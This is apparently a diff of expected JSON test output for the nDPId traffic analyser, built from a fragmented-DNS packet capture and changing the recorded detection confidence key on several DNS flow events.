00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1560869895045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":112,"pkt_l4_len":58,"thread_ts_msec":1560869895045,"pkt":"CFsOoYNeAAwpfKTLht1gAPc5ADoRQCABBHAfCxawAgwp\/\/58pMsmIAD+AAAAAAAAAAAAAAD+tnUANQA6UeeM7AEgAAEAAAAAAAEGZXJmcG9wAmRlAAAcAAEAACkQAAAAAAAADAAKAAh2WSv8Ots3rg=="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1560869895070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":156,"pkt_l4_len":102,"thread_ts_msec":1560869895070,"pkt":"AAwpfKTLCFsOoYNeht1gAAAAAGYRPCYgAP4AAAAAAAAAAAAAAP4gAQRwHwsWsAIMKf\/+fKTLADW2dQBmf6uM7IGAAAEAAgAAAAEGZXJmcG9wAmRlAAAcAAHADAAcAAEAAAEsABAmBkcAADAAAAAAAABoGGKRwAwAHAABAAABLAAQJgZHAAAwAAAAAAAAaBhjkQAAKQIAAAAAAAAA"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869895070,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":1,"num_answers":3,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.6.71.0"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869895070,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":1,"num_answers":3,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.6.71.0"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1560869900222,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1560869900222,"pkt":"CFsOoYNeAAwpfKTLht1gDZ0NADwRQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBT2bEANQA8zxHCoAEgAAEAAAAAAAEId2ViZXJsYWICZGUAADAAAQAAKRAAAACAAAAMAAoACPFs5uYvfUZc"} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1560869905222,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1560869905222,"pkt":"CFsOoYNeAAwpfKTLht1gDZ0NADwRQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBT2bEANQA8zxHCoAEgAAEAAAAAAAEId2ViZXJsYWICZGUAADAAAQAAKRAAAACAAAAMAAoACPFs5uYvfUZc"} 02413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1560869905232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1494,"pkt_l4_len":1432,"thread_ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyBaAsPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAAAQAABpoANdmxBspAOcKghQAAAQAEAAAAAQh3ZWJlcmxhYgJkZQAAMAABwAwAMAABAAAAPAIIAQEDCgMBAAHd7\/3tIq12CjsLWBAd1T3u8\/far4uZXvf8tV18qZaecv+cWqq5v63pRvKYMfBrDVtiIL4iSgCelIlOORESqB\/n89qn9klBRxVsJMHolsi2eBGR4aML4ghMfeD+DrMDSl5nWB3t\/K5Rz2vtzsqVvYGH0fZYQiit53gj6vP2hRbE0yO3UPkNpBEVogjAsm5eFjsLAaP0ZZzzOMrnzCiJQAYjOTVkDzZiOo2MwGKWKMlIXfR55yCA5TUPPR6V0HRZsrDK2l2G+6gzqDhIjqHbbSh9Mv77SdkkVNOUReABLpmnCFMwIuSy9nDEMQu7e65QyOF+NjUXziwKhrjnnJRY86s9znQCVnoPwAJ0m29NgBgpEN+9E19YVr3gF7esaT1ji4B10iyBf5c\/sJfg5vGTVg55+cxCbhI98aL2tYPM5kVyTpqgOlYRqnsMRfHPsinjRDh8+F+P0S5lhyLhG726D9NA5OQPW4cmRlbMrTiYPjcIRULbwVi5g\/NhRbX0rdr5mxRTcAGTp0WViThvS+0xXBiJtThFC5qIVMhS7ARjFwxTrtZNKOqapuPebbAbjMiTaX3UKD8DpFKbCouo5jaur0Y77zYiW3BcpU0K6hxkxrjqKblLAW1F4\/5zq+COo+NpOhgyLk8iw5Gla3a8V5hp3zZ0rXalprx16P2BcHZbPW3E+8AMADAAAQAAADwBCAEAAwoDAQAB0FTcKPFQrDtJ5jNrtzHKr9eDfOdVCwzO4X9R4tqKA65u0keHGEv6bXb0jFCRMqjwlEhdwpcP5pWLO2KaXz7wE8JcU09+0Wl0ULMFE0YeP9xrWD8WVyTq\/lq9p8H+EaptYpjYsQYpvmS1hYaPwkHSasoaoNlU\/KJ4LR1hW\/TaI5o69SF2XtC2BXJtHdXqAeWGgbQHEb4ZuNSn43I8KVu4w4jB+VtUYHn3jo\/JAZCCcY1fYvUwe6Y5pgL8PdSfLNBk0yaqPzkbAM0\/AR4N8urrCbUFR\/HszDBwRW47YHRiZTKI+JJ9SgZPCbY\/WcY0yGViKPdtj1W\/LEKo9CcrSzlOvcAMAC4AAQAAADwCHwAwCgIAAAA8XSexsF0AI8Ezewh3ZWJlcmxhYgJkZQDDZMohasNCzdZy+qXT+i9EuX\/inlaoHckoPQ6pZUM55HOKiXWwbCF2bgR2vTatltfgdQMYsjHLb9y8\/8K16x1bINo7jHhPhiQ3mZPnhRDbC819\/mg\/DAJlEfo4\/PIHroaOXHkEsxclA3Sfl5XzqMY8dIIjCMSIRohmpz3ajd1g8Q5nPhvruiTi3rbkkaFuvAu6JBazSxvplBTGRsLiwD\/keT1H0ch7BVc1oZ6xmkqy68vIsD63Fj1r1Prt7pmrCHTCuEgsO78D9dCQuWCLkJQxGUVXJj5CI3Hv7xFFgpu2WdK7EiEBH5rHphjb8hJPFep1cggzgdSO7gr4PL16UQJ4paFWEovlSSSKN6CqV0KlzY5UKpoC4bOcRMiiujkcgLRcJzDNjTcP59699eiRBYcnSUNu7NR\/AQOsLe1gcGBMYVI28uXABijFJJPUYQFFRKKQYYy7U8augfodJClNM+5PjDrN7VUaoyW\/CtbFigLZaje\/SbLFkod9oTkuhnetL7fyEnlGfxKmEZ218qPcsKDJRrRyymc+WdZ+tPcZvQXr6AVS7RZSoUTV\/+5dVd2kWuuF2w5rsnAIOU3wwIEPhsTwq9njhb9Bp9jOMH3FFbo4srNvY4pocOs9Lic1Os813bu7VyQz3Nrv\/xfPOPvvG\/\/ufcPEO13FnB7dwg\/ymTeeu8NjAC4AAQAAADwBHwAwCgIAAAA8XSexsF0AI8GQRwh3"} -00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869905232,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869905232,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00211{"error_event_id":12,"error_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":334,"global_ts_msec":1560869905233} 00776{"packet_event_id":1,"packet_event_name":"packet","packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":368,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":368,"pkt_l4_len":0,"thread_ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyATosPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAFmAAABpplYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRNeoUG2ZbhJAUMEBAu7geapxJ7U1z+UqhkFSi8Qu6jROnMih5xzmixXOjO2RiHT8eMzQMHqilreexmdz+7rH4jCggpAg2YenRMzpvhrf0+OEWUNhwq6dNYVlNWg1Yf1oxCRsZ6Xiq2pemle4KOkgobWECgdELaMnIZKUJ0WtpAZJuCbAIPvak3YgHcNPR4Sbx1lKRTPW6QxjFsHJ5X\/B6mNMVtqG97wzaO\/ugVwH81Qt2Llpj5Wb873AtMbd7OQYLwhJ7fhxJ9xNJn6SlVRp6C+1P2Wyu\/7U0mgP+sAACkQAAAAgAAAHAAKABjxbObmL31GXCozdz5dCPwRZU4FwINgbJY="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1560869910534,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1560869910534,"pkt":"CFsOoYNeAAwpfKTLCABFAABQVdgAAEARt8DC9wUGwRjj7spPADUAPG1Sic4BIAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAADAAKAAgdxATcWA6WbA=="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1560869910547,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAXc3KUgAEARC2fBGOPuwvcFBgA1yk8Gysn4ic6FAAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdJ7GwXQAjwTN7CHdlYmVybGFiAmRlAMNkyiFqw0LN1nL6pdP6L0S5f+KeVqgdySg9DqllQznkc4qJdbBsIXZuBHa9Nq2W1+B1AxiyMctv3Lz\/wrXrHVsg2juMeE+GJDeZk+eFENsLzX3+aD8MAmUR+jj88geuho5ceQSzFyUDdJ+XlfOoxjx0giMIxIhGiGanPdqN3WDxDmc+G+u6JOLetuSRoW68C7okFrNLG+mUFMZGwuLAP+R5PUfRyHsFVzWhnrGaSrLry8iwPrcWPWvU+u3umasIdMK4SCw7vwP10JC5YIuQlDEZRVcmPkIjce\/vEUWCm7ZZ0rsSIQEfmsemGNvyEk8V6nVyCDOB1I7uCvg8vXpRAniloVYSi+VJJIo3oKpXQqXNjlQqmgLhs5xEyKK6ORyAtFwnMM2NNw\/n3r316JEFhydJQ27s1H8BA6wt7WBwYExhUjby5cAGKMUkk9RhAUVEopBhjLtTxq6B+h0kKU0z7k+MOs3tVRqjJb8K1sWKAtlqN79JssWSh32hOS6Gd60vt\/ISeUZ\/EqYRnbXyo9ywoMlGtHLKZz5Z1n609xm9BevoBVLtFlKhRNX\/7l1V3aRa64XbDmuycAg5TfDAgQ+GxPCr2eOFv0Gn2M4wfcUVujiys29jimhw6z0uJzU6zzXdu7tXJDPc2u\/\/F884++8b\/+59w8Q7XcWcHt3CD\/KZN567w2MALgABAAAAPAEfADAKAgAAADxdJ7GwXQAjwZBHCHdlYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRM="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869910547,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869910547,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00210{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":258,"global_ts_msec":1560869910547} 00677{"packet_event_id":1,"packet_event_name":"packet","packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":292,"pkt_l4_len":0,"thread_ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAEW3KUAuUARL3TBGOPuwvcFBl6hQbZluEkBQwQEC7uB5qnEntTXP5SqGQVKLxC7qNE6cyKHnHOaLFc6M7ZGIdPx4zNAweqKWt57GZ3P7usfiMKCCkCDZh6dEzOm+Gt\/T44RZQ2HCrp01hWU1aDVh\/WjEJGxnpeKral6aV7go6SChtYQKB0QtoychkpQnRa2kBkm4JsAg+9qTdiAdw09HhJvHWUpFM9bpDGMWwcnlf8HqY0xW2ob3vDNo7+6BXAfzVC3YuWmPlZvzvcC0xt3s5BgvCEnt+HEn3E0mfpKVVGnoL7U\/ZbK7\/tTSaA\/6wAAKRAAAACAAAAcAAoAGB3EBNxYDpZslD4VVl0I\/BakNFp6chM\/YQ=="} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1560869913732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869913732,"pkt":"CFsOoYNeAAwpfKTLht1gCfvPADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER7IYANQA07tw\/fwEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAEAACkCAAAAAAAAAA=="} -00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 